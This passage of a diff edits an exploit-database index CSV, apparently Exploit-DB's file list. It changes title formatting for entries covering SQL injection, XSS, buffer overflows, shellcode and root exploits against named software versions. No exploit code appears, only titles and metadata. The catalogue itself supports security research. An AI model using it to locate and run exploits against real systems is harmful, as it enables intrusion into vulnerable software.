'url' Parameter URI Redirection",2012-02-18,sonyy,php,webapps,0 @@ -33275,11 +33270,11 @@ id,file,description,date,author,platform,type,port 36877,platforms/hardware/remote/36877.html,"Multiple D-Link DCS Products - 'security.cgi' Cross-Site Request Forgery",2012-02-23,"Rigan Iimrigan",hardware,remote,0 36878,platforms/php/webapps/36878.txt,"Mobile Mp3 Search Script 2.0 - 'dl.php' HTTP Response Splitting",2012-02-23,"Corrado Liotta",php,webapps,0 36880,platforms/windows/remote/36880.rb,"Adobe Flash Player - UncompressViaZlibVariant Uninitialized Memory",2015-05-01,Metasploit,windows,remote,0 -36881,platforms/multiple/dos/36881.txt,"TestDisk 6.14 Check_OS2MB Stack Buffer Overflow",2015-05-01,Security-Assessment.com,multiple,dos,0 +36881,platforms/multiple/dos/36881.txt,"TestDisk 6.14 - Check_OS2MB Stack Buffer Overflow",2015-05-01,Security-Assessment.com,multiple,dos,0 36882,platforms/php/webapps/36882.txt,"MyJobList 0.1.3 - 'eid' Parameter SQL Injection",2012-02-26,"Red Security TEAM",php,webapps,0 36883,platforms/php/webapps/36883.txt,"Webglimpse 2.x - Multiple Cross-Site Scripting Vulnerabilities",2012-02-26,MustLive,php,webapps,0 36884,platforms/linux/remote/36884.py,"libpurple 2.8.10 OTR Information Disclosure",2012-02-25,"Dimitris Glynos",linux,remote,0 -36885,platforms/php/webapps/36885.txt,"Bontq 'user/' URI Cross-Site Scripting",2012-02-27,sonyy,php,webapps,0 +36885,platforms/php/webapps/36885.txt,"Bontq - 'user/' URI Cross-Site Scripting",2012-02-27,sonyy,php,webapps,0 36886,platforms/php/webapps/36886.txt,"OSQA's CMS - Multiple HTML Injection Vulnerabilities",2012-02-27,"Ucha Gobejishvili",php,webapps,0 36887,platforms/linux/local/36887.py,"GNOME NetworkManager 0.x - Local Arbitrary File Access",2012-02-29,Ludwig,linux,local,0 36888,platforms/php/webapps/36888.html,"Dotclear 2.4.1.2 - /admin/auth.php login_data Parameter XSS",2012-02-29,"High-Tech Bridge SA",php,webapps,0 @@ -33313,11 +33308,11 @@ id,file,description,date,author,platform,type,port 36906,platforms/linux/dos/36906.txt,"Apache Xerces-C XML Parser < 3.1.2 - DoS POC",2015-05-04,beford,linux,dos,0 36907,platforms/php/webapps/36907.txt,"WordPress Ultimate Product Catalogue 3.1.2 Plugin - Multiple Persistent XSS / CSRF / File Upload",2015-05-04,"Felipe Molina",php,webapps,0 36908,platforms/lin_x86/shellcode/36908.c,"Linux/x86 - exit(0) shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0 -36965,platforms/php/webapps/36965.txt,"Omnistar Live Cross-Site Scripting and SQL Injection",2012-03-13,sonyy,php,webapps,0 +36965,platforms/php/webapps/36965.txt,"Omnistar Live - Cross-Site Scripting / SQL Injection",2012-03-13,sonyy,php,webapps,0 36966,platforms/linux/local/36966.txt,"LightDM 1.0.6 - Arbitrary File Deletion",2012-03-13,"Ryan Lortie",linux,local,0 36967,platforms/php/webapps/36967.txt,"Max's Guestbook 1.0 - Multiple Remote Vulnerabilities",2012-03-14,n0tch,php,webapps,0 36968,platforms/php/webapps/36968.txt,"Max's PHP Photo Album 1.0 - 'id' Parameter Local File Inclusion",2012-03-14,n0tch,php,webapps,0 -36969,platforms/windows/dos/36969.txt,"Citrix 11.6.1 Licensing Administration Console Denial of Service",2012-03-15,Rune,windows,dos,0 +36969,platforms/windows/dos/36969.txt,"Citrix 11.6.1 - Licensing Administration Console Denial of Service",2012-03-15,Rune,windows,dos,0 36970,platforms/php/webapps/36970.txt,"JPM Article Script 6 - 'page2' Parameter SQL Injection",2012-03-16,"Vulnerability Research Laboratory",php,webapps,0 36971,platforms/java/webapps/36971.txt,"JavaBB 0.99 - 'userId' Parameter Cross-Site Scripting",2012-03-18,sonyy,java,webapps,0 36972,platforms/windows/dos/36972.py,"TYPSoft FTP Server 1.1 - 'APPE' Command Remote Buffer Overflow",2012-03-19,"brock haun",windows,dos,0 @@ -33337,8 +33332,8 @@ id,file,description,date,author,platform,type,port 36937,platforms/php/webapps/36937.html,"phpMyVisites 2.4 - phpmv2/index.php Multiple Cross-Site Scripting Vulnerabilities",2012-03-09,AkaStep,php,webapps,0 36938,platforms/php/webapps/36938.txt,"singapore 0.10.1 - 'gallery' Parameter Cross-Site Scripting",2012-03-11,T0xic,php,webapps,0 36939,platforms/java/webapps/36939.txt,"EJBCA 4.0.7 - 'issuer' Parameter Cross-Site Scripting",2012-03-11,MustLive,java,webapps,0 -36940,platforms/cgi/webapps/36940.txt,"Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery",2015-05-07,"Veit Hailperin",cgi,webapps,443 -36941,platforms/xml/webapps/36941.txt,"IBM WebSphere Portal Stored Cross-Site Scripting",2015-05-07,"Filippo Roncari",xml,webapps,0 +36940,platforms/cgi/webapps/36940.txt,"Dell SonicWALL Secure Remote Access (SRA) Appliance - Cross-Site Request Forgery",2015-05-07,"Veit Hailperin",cgi,webapps,443 +36941,platforms/xml/webapps/36941.txt,"IBM WebSphere Portal - Stored Cross-Site Scripting",2015-05-07,"Filippo Roncari",xml,webapps,0 36942,platforms/php/webapps/36942.txt,"WordPress Freshmail Plugin 1.5.8 - (shortcode.php) SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80 36943,platforms/ios/webapps/36943.txt,"Album Streamer 2.0 iOS - Directory Traversal",2015-05-07,Vulnerability-Lab,ios,webapps,0 36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross-Site Scripting",2012-03-12,"Simon Ganiere",php,webapps,0 @@ -33352,7 +33347,7 @@ id,file,description,date,author,platform,type,port 36952,platforms/php/webapps/36952.txt,"WordPress N-Media Website Contact Form with File Upload 1.5 Plugin - Local File Inclusion",2015-05-08,T3N38R15,php,webapps,0 36953,platforms/php/webapps/36953.txt,"SynTail 1.5 Build 566 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,0 36954,platforms/php/webapps/36954.txt,"WordPress Yet Another Related Posts Plugin 4.2.4 - CSRF",2015-05-08,Evex,php,webapps,80 -36955,platforms/osx/remote/36955.py,"MacKeeper URL Handler Remote Code Execution",2015-05-08,"Braden Thomas",osx,remote,0 +36955,platforms/osx/remote/36955.py,"MacKeeper - URL Handler Remote Code Execution",2015-05-08,"Braden Thomas",osx,remote,0 36956,platforms/windows/remote/36956.rb,"Adobe Flash Player - domainMemory ByteArray Use-After-Free",2015-05-08,Metasploit,windows,remote,0 36957,platforms/php/remote/36957.rb,"WordPress RevSlider 3.0.95 Plugin - File Upload and Execute",2015-05-08,Metasploit,php,remote,80 36958,platforms/php/webapps/36958.txt,"WordPress Ultimate Profile Builder Plugin 2.3.3 - CSRF",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 @@ -33448,9 +33443,9 @@ id,file,description,date,author,platform,type,port 37062,platforms/php/webapps/37062.txt,"VBulletin 4.1.10 - 'announcementid' Parameter SQL Injection",2012-04-04,Am!r,php,webapps,0 37063,platforms/php/webapps/37063.txt,"WordPress TagGator Plugin - 'tagid' Parameter SQL Injection",2012-04-05,Am!r,php,webapps,0 37064,platforms/win_x86-64/local/37064.py,"Windows 8.0 < 8.1 x64 - TrackPopupMenu Privilege Escalation (MS14-058)",2015-05-19,ryujin,win_x86-64,local,0 -37066,platforms/hardware/remote/37066.py,"Phoenix Contact ILC 150 ETH PLC Remote Control Script",2015-05-20,Photubias,hardware,remote,0 +37066,platforms/hardware/remote/37066.py,"Phoenix Contact ILC 150 ETH PLC - Remote Control Script",2015-05-20,Photubias,hardware,remote,0 37067,platforms/php/webapps/37067.txt,"WordPress FeedWordPress Plugin 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80 -37068,platforms/windows/dos/37068.py,"ZOC SSH Client Buffer Overflow (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0 +37068,platforms/windows/dos/37068.py,"ZOC SSH Client - Buffer Overflow (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0 37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 - execve _/bin/sh_ shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0 37070,platforms/php/webapps/37070.txt,"WordPress Uploadify Integration Plugin 0.9.6 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0 37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 - Local File Inclusion / SQL Injection",2012-04-09,wacky,php,webapps,0 @@ -33495,12 +33490,12 @@ id,file,description,date,author,platform,type,port 37107,platforms/php/webapps/37107.txt,"WordPress NewStatPress Plugin 0.9.8 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 37108,platforms/php/webapps/37108.txt,"WordPress Landing Pages Plugin 1.8.4 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 37109,platforms/php/webapps/37109.txt,"WordPress GigPress Plugin 2.3.8 - SQL Injection",2015-05-26,"Adrián M. F.",php,webapps,80 -37110,platforms/java/webapps/37110.py,"Apache Jackrabbit WebDAV XXE Exploit",2015-05-26,"Mikhail Egorov",java,webapps,8080 +37110,platforms/java/webapps/37110.py,"Apache Jackrabbit - WebDAV XXE Exploit",2015-05-26,"Mikhail Egorov",java,webapps,8080 37111,platforms/php/webapps/37111.txt,"WordPress MailChimp Subscribe Forms 1.1 Plugin - Remote Code Execution",2015-05-26,woodspeed,php,webapps,80 37112,platforms/php/webapps/37112.txt,"WordPress church_admin Plugin 0.800 - Stored XSS",2015-05-26,woodspeed,php,webapps,80 37113,platforms/php/webapps/37113.txt,"Wordpess Simple Photo Gallery 1.7.8 - Blind SQL Injection",2015-05-26,woodspeed,php,webapps,80 -37114,platforms/jsp/webapps/37114.txt,"Sendio ESP Information Disclosure",2015-05-26,"Core Security",jsp,webapps,80 -37115,platforms/perl/webapps/37115.txt,"Clickheat 1.13+ Remote Command Execution",2015-05-26,"Calum Hutton",perl,webapps,0 +37114,platforms/jsp/webapps/37114.txt,"Sendio ESP - Information Disclosure",2015-05-26,"Core Security",jsp,webapps,80 +37115,platforms/perl/webapps/37115.txt,"Clickheat 1.13+ - Remote Command Execution",2015-05-26,"Calum Hutton",perl,webapps,0 37116,platforms/php/webapps/37116.py,"SilverStripe 2.4.7 - install.php PHP Code Injection",2012-04-27,"Mehmet Ince",php,webapps,0 37117,platforms/perl/webapps/37117.txt,"Croogo CMS 1.3.4 - Multiple HTML Injection Vulnerabilities",2012-04-29,"Chokri Ben Achor",perl,webapps,0 37118,platforms/php/webapps/37118.txt,"SKYUC 3.2.1 - 'encode' Parameter Cross-Site Scripting",2012-04-27,farbodmahini,php,webapps,0 @@ -33526,7 +33521,7 @@ id,file,description,date,author,platform,type,port 37138,platforms/php/webapps/37138.txt,"Ramui Forum Script - 'query' Parameter Cross-Site Scripting",2012-05-07,3spi0n,php,webapps,0 37139,platforms/php/webapps/37139.txt,"JibberBook 2.3 - 'Login_form.php' Authentication Security Bypass",2012-05-07,L3b-r1'z,php,webapps,0 37140,platforms/php/webapps/37140.html,"PHP Enter 4.1.2 - 'banners.php' PHP Code Injection",2012-05-08,L3b-r1'z,php,webapps,0 -37141,platforms/hardware/remote/37141.txt,"Linksys WRT54GL Wireless Router Cross-Site Request Forgery",2012-05-08,Kalashinkov3,hardware,remote,0 +37141,platforms/hardware/remote/37141.txt,"Linksys WRT54GL Wireless Router - Cross-Site Request Forgery",2012-05-08,Kalashinkov3,hardware,remote,0 37142,platforms/php/webapps/37142.txt,"OrangeHRM 2.7 RC - plugins/ajaxCalls/haltResumeHsp.php hspSummaryId Parameter SQL Injection",2012-05-09,"High-Tech Bridge SA",php,webapps,0 37143,platforms/php/webapps/37143.txt,"OrangeHRM 2.7 RC - plugins/ajaxCalls/haltResumeHsp.php newHspStatus Parameter XSS",2012-05-09,"High-Tech Bridge SA",php,webapps,0 37144,platforms/php/webapps/37144.txt,"OrangeHRM 2.7 RC - templates/hrfunct/emppop.php sortOrder1 Parameter XSS",2012-05-09,"High-Tech Bridge SA",php,webapps,0 @@ -33562,13 +33557,13 @@ id,file,description,date,author,platform,type,port 37178,platforms/php/webapps/37178.txt,"2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37179,platforms/php/webapps/37179.txt,"iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37180,platforms/php/webapps/37180.txt,"WordPress Newsletter Manager Plugin 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F Remote Root Exploit",2015-06-03,"Jeremy Brown",hardware,remote,0 -37185,platforms/hardware/webapps/37185.py,"Seagate Central 2014.0410.0026-F Remote Facebook Access Token Exploit",2015-06-03,"Jeremy Brown",hardware,webapps,0 +37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Root Exploit",2015-06-03,"Jeremy Brown",hardware,remote,0 +37185,platforms/hardware/webapps/37185.py,"Seagate Central 2014.0410.0026-F - Remote Facebook Access Token Exploit",2015-06-03,"Jeremy Brown",hardware,webapps,0 37182,platforms/php/webapps/37182.txt,"WordPress LeagueManager 3.9.11 Plugin - SQLi",2015-06-02,javabudd,php,webapps,0 37183,platforms/linux/local/37183.c,"PonyOS 3.0 - tty ioctl() Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0 -37187,platforms/windows/dos/37187.py,"Jildi FTP Client Buffer Overflow PoC",2015-06-03,metacom,windows,dos,21 +37187,platforms/windows/dos/37187.py,"Jildi FTP Client - Buffer Overflow PoC",2015-06-03,metacom,windows,dos,21 37188,platforms/windows/dos/37188.txt,"WebDrive 12.2 (B4172) - Buffer Overflow",2015-06-03,Vulnerability-Lab,windows,dos,0 -37189,platforms/php/webapps/37189.txt,"Media Library Categories Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37189,platforms/php/webapps/37189.txt,"Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37190,platforms/php/webapps/37190.txt,"LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37191,platforms/php/webapps/37191.txt,"Leaflet Maps Marker Plugin 0.0.1 for WordPress - leaflet_layer.php id Parameter XSS",2012-05-15,"Heine Pedersen",php,webapps,0 37192,platforms/php/webapps/37192.txt,"Leaflet Maps Marker Plugin 0.0.1 for WordPress - leaflet_marker.php id Parameter XSS",2012-05-15,"Heine Pedersen",php,webapps,0 @@ -33597,7 +33592,7 @@ id,file,description,date,author,platform,type,port 37217,platforms/php/webapps/37217.txt,"Artiphp 5.5.0 Neo - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Gjoko Krstic",php,webapps,0 37218,platforms/jsp/dos/37218.txt,"Atlassian Tempo 6.4.3 / JIRA 5.0 0 / Gliffy 3.7.0 - XML Parsing Denial of Service",2012-05-17,anonymous,jsp,dos,0 37219,platforms/php/webapps/37219.txt,"PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",php,webapps,0 -37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 Cross-Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0 +37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 - Cross-Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0 37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye 2.5.7 / Crucible 2.5.7 Plugins - XML Parsing Unspecified Security",2012-05-17,anonymous,jsp,webapps,0 37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - /admin/file_manager/file_upload_submit.asp Multiple Parameter File Upload ASP Code Execution",2012-05-21,"Aung Khant",asp,webapps,0 37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - /admin/file_manager/browse.asp path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0 @@ -33624,7 +33619,7 @@ id,file,description,date,author,platform,type,port 37245,platforms/php/webapps/37245.txt,"Pasworld - detail.php Blind Sql Injection",2015-06-08,"Sebastian khan",php,webapps,0 37266,platforms/php/webapps/37266.txt,"ClickHeat 1.14 - Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80 37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0 -37250,platforms/xml/webapps/37250.txt,"HP WebInspect 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0 +37250,platforms/xml/webapps/37250.txt,"HP WebInspect 10.4 - XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0 39479,platforms/ios/webapps/39479.txt,"InstantCoder 1.0 iOS - Multiple Vulnerabilities",2016-02-22,Vulnerability-Lab,ios,webapps,0 37298,platforms/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",hardware,webapps,80 37299,platforms/windows/dos/37299.py,"XtMediaPlayer 0.93 (.wav) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0 @@ -33632,7 +33627,7 @@ id,file,description,date,author,platform,type,port 37301,platforms/php/webapps/37301.txt,"TYPO3 Akronymmanager Extension 0.5.0 - SQL Injection",2015-06-16,"RedTeam Pentesting",php,webapps,80 37302,platforms/php/webapps/37302.txt,"E-Detective Lawful Interception System - Multiple Vulnerabilities",2015-06-16,"Mustafa Al-Bassam",php,webapps,0 37304,platforms/php/webapps/37304.txt,"BlackCat CMS 1.1.1 - Arbitrary File Download",2015-06-17,d4rkr0id,php,webapps,80 -37305,platforms/php/webapps/37305.txt,"Plogger Photo Gallery SQL Injection",2012-05-22,"Eyup CELIK",php,webapps,0 +37305,platforms/php/webapps/37305.txt,"Plogger Photo Gallery - SQL Injection",2012-05-22,"Eyup CELIK",php,webapps,0 37306,platforms/linux/dos/37306.txt,"Mosh - Remote Denial of Service",2012-05-22,"Timo Juhani Lindfors",linux,dos,0 37307,platforms/php/webapps/37307.txt,"phphq.Net phAlbum 1.5.1 - 'index.php' Cross-Site Scripting",2012-05-21,"Eyup CELIK",php,webapps,0 37308,platforms/php/webapps/37308.txt,"RuubikCMS 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal",2012-05-23,AkaStep,php,webapps,0 @@ -33641,7 +33636,7 @@ id,file,description,date,author,platform,type,port 37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x - module.php Multiple Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 - modules.php URI XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 - includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php img_url Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0 -37314,platforms/php/webapps/37314.txt,"Yellow Duck Framework 2.0 Beta1 Local File Disclosure",2012-05-23,L3b-r1'z,php,webapps,0 +37314,platforms/php/webapps/37314.txt,"Yellow Duck Framework 2.0 Beta1 - Local File Disclosure",2012-05-23,L3b-r1'z,php,webapps,0 37315,platforms/php/webapps/37315.txt,"phpCollab 2.5 - uploadfile.php Crafted Request Arbitrary Non-PHP File Upload",2012-05-24,"team ' and 1=1--",php,webapps,0 37257,platforms/php/webapps/37257.txt,"FiverrScript - CSRF (Add New Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80 37258,platforms/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams - Remote File Disclosure Exploit",2015-06-10,"Viktor Minin",hardware,webapps,0 @@ -33653,7 +33648,7 @@ id,file,description,date,author,platform,type,port 37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF",2015-06-10,"Nitin Venkatesh",php,webapps,80 37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - 'diff' Command Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0 37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 - (.m3u) Local Crash PoC",2015-06-12,0neb1n,windows,dos,0 -37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0 +37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 - Local Crash PoC",2015-06-12,0neb1n,windows,dos,0 37292,platforms/linux/local/37292.c,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Root Shell",2015-06-16,rebel,linux,local,0 37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,php,webapps,80 37271,platforms/multiple/webapps/37271.txt,"Opsview 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80 @@ -33676,7 +33671,7 @@ id,file,description,date,author,platform,type,port 37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection",2015-06-15,"walid naceri",php,webapps,0 37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service",2015-06-15,3unnym00n,windows,dos,0 37293,platforms/linux/local/37293.txt,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow)",2015-06-16,rebel,linux,local,0 -37561,platforms/multiple/dos/37561.pl,"UPNPD M-SEARCH ssdp:discover Reflection Denial of Service",2015-07-10,"Todor Donev",multiple,dos,1900 +37561,platforms/multiple/dos/37561.pl,"UPNPD M-SEARCH - ssdp:discover Reflection Denial of Service",2015-07-10,"Todor Donev",multiple,dos,1900 37329,platforms/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 - Multiple SQL Injection and Local File Inclusion",2012-05-27,n4ss1m,php,webapps,0 37330,platforms/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 - Database Information Disclosure",2012-05-28,L3b-r1'z,php,webapps,0 37331,platforms/php/webapps/37331.py,"WHMCS - 'boleto_bb.php' SQL Injection",2012-05-29,dex,php,webapps,0 @@ -33689,7 +33684,7 @@ id,file,description,date,author,platform,type,port 37321,platforms/php/webapps/37321.txt,"DynPage 1.0 - 'ckfinder' Multiple Arbitrary File Upload Vulnerabilities",2012-05-25,KedAns-Dz,php,webapps,0 37322,platforms/multiple/webapps/37322.txt,"ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities",2015-06-19,Vulnerability-Lab,multiple,webapps,0 37323,platforms/hardware/webapps/37323.txt,"ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Delete",2015-06-19,Vulnerability-Lab,hardware,webapps,0 -37325,platforms/multiple/webapps/37325.txt,"Lively Cart SQL Injection",2015-06-19,"Manish Tanwar",multiple,webapps,0 +37325,platforms/multiple/webapps/37325.txt,"Lively Cart - SQL Injection",2015-06-19,"Manish Tanwar",multiple,webapps,0 37336,platforms/multiple/remote/37336.txt,"CUPS < 2.0.3 - Multiple Vulnerabilities",2015-06-22,"Google Security Research",multiple,remote,0 37326,platforms/windows/dos/37326.py,"WinylPlayer 3.0.3 - Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0 37327,platforms/windows/dos/37327.py,"HansoPlayer 3.4.0 - Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0 @@ -33712,7 +33707,7 @@ id,file,description,date,author,platform,type,port 37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0 37440,platforms/php/webapps/37440.txt,"Watchguard XCS 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0 37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - XSS",2015-06-24,hyp3rlinx,php,webapps,80 -37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 GIF Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0 +37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 - .GIF Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0 37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 and Bridge CC 2014 - .Gif Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos,0 37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 and Bridge CC 2014 - .PNG Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos,0 37361,platforms/php/webapps/37361.txt,"WordPress Huge-IT Slider 2.7.5 Plugin - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",php,webapps,0 @@ -33726,7 +33721,7 @@ id,file,description,date,author,platform,type,port 37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0 37370,platforms/php/webapps/37370.php,"WordPress FCChat Widget Plugin 2.2.x - 'Upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps,0 37371,platforms/php/webapps/37371.php,"WordPress Picturesurf Gallery Plugin - 'upload.php' Arbitrary File Upload",2012-06-03,"Sammy FORGIT",php,webapps,0 -37372,platforms/java/webapps/37372.html,"BMC Identity Management Cross-Site Request Forgery",2012-06-11,"Travis Lee",java,webapps,0 +37372,platforms/java/webapps/37372.html,"BMC Identity Management - Cross-Site Request Forgery",2012-06-11,"Travis Lee",java,webapps,0 37373,platforms/php/webapps/37373.php,"WordPress Contus Video Gallery Plugin - 'upload1.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 37374,platforms/php/webapps/37374.txt,"Joomla! Alphacontent Component - 'limitstart' Parameter SQL Injection",2012-06-10,xDarkSton3x,php,webapps,0 37375,platforms/php/webapps/37375.php,"Joomla! Joomsport Component - SQL Injection / Arbitrary File Upload",2012-06-11,KedAns-Dz,php,webapps,0 @@ -33758,11 +33753,11 @@ id,file,description,date,author,platform,type,port 37429,platforms/hardware/remote/37429.txt,"Juniper Networks Mobility System Software - 'aaa/wba_login.html' Cross-Site Scripting",2012-06-14,"Craig Lambert",hardware,remote,0 37403,platforms/php/webapps/37403.php,"WordPress Invit0r Plugin - 'ofc_upload_image.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",php,webapps,0 37404,platforms/php/webapps/37404.txt,"MediaWiki 1.x - 'uselang' Parameter Cross-Site Scripting",2012-06-17,anonymous,php,webapps,0 -37405,platforms/hardware/remote/37405.py,"Edimax IC-3030iWn UDP Packet Password Information Disclosure",2012-06-14,y3dips,hardware,remote,0 +37405,platforms/hardware/remote/37405.py,"Edimax IC-3030iWn - UDP Packet Password Information Disclosure",2012-06-14,y3dips,hardware,remote,0 37406,platforms/php/webapps/37406.php,"WordPress Zingiri Web Shop Plugin 2.4.3 - 'uploadfilexd.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",php,webapps,0 37407,platforms/php/webapps/37407.txt,"ADICO - 'index.php' Script SQL Injection",2012-06-15,"Ibrahim El-Sayed",php,webapps,0 37408,platforms/php/webapps/37408.txt,"Simple Forum PHP - Multiple SQL Injection",2012-06-14,"Vulnerability Research Laboratory",php,webapps,0 -37409,platforms/php/webapps/37409.txt,"NetArt Media Jobs Portal SQL Injection",2012-06-14,"Ibrahim El-Sayed",php,webapps,0 +37409,platforms/php/webapps/37409.txt,"NetArt Media Jobs Portal - SQL Injection",2012-06-14,"Ibrahim El-Sayed",php,webapps,0 37410,platforms/php/webapps/37410.php,"Joomla! hwdVideoShare Component - 'flash_upload.php' Arbitrary File Upload",2012-06-17,"Sammy FORGIT",php,webapps,0 37411,platforms/php/webapps/37411.txt,"WordPress Organizer Plugin - Multiple Security Vulnerabilities",2012-06-15,MustLive,php,webapps,0 37412,platforms/php/webapps/37412.php,"Joomla! Maian Media Component - 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps,0 @@ -33775,7 +33770,7 @@ id,file,description,date,author,platform,type,port 37419,platforms/php/webapps/37419.txt,"WordPress Wp-ImageZoom Plugin - 'file' Parameter Remote File Disclosure",2012-06-18,"Sammy FORGIT",php,webapps,0 37420,platforms/php/webapps/37420.txt,"VANA CMS - 'index.php' Script SQL Injection",2012-06-18,"Black Hat Group",php,webapps,0 37565,platforms/php/webapps/37565.txt,"Mahara 1.4.1 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-08-02,anonymous,php,webapps,0 -37566,platforms/php/dos/37566.php,"PHP 5.4.3 PDO Memory Access Violation Denial of Service",2012-08-02,0x721427D8,php,dos,0 +37566,platforms/php/dos/37566.php,"PHP 5.4.3 - PDO Memory Access Violation Denial of Service",2012-08-02,0x721427D8,php,dos,0 37497,platforms/php/webapps/37497.txt,"Flogr - 'tag' Parameter Multiple Cross-Site Scripting Vulnerabilities",2012-07-09,Nafsh,php,webapps,0 37423,platforms/php/webapps/37423.txt,"DedeCMS < 5.7-sp1 - Remote File Inclusion",2015-06-29,zise,php,webapps,0 37424,platforms/hardware/webapps/37424.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure",2015-06-29,"Fady Mohammed 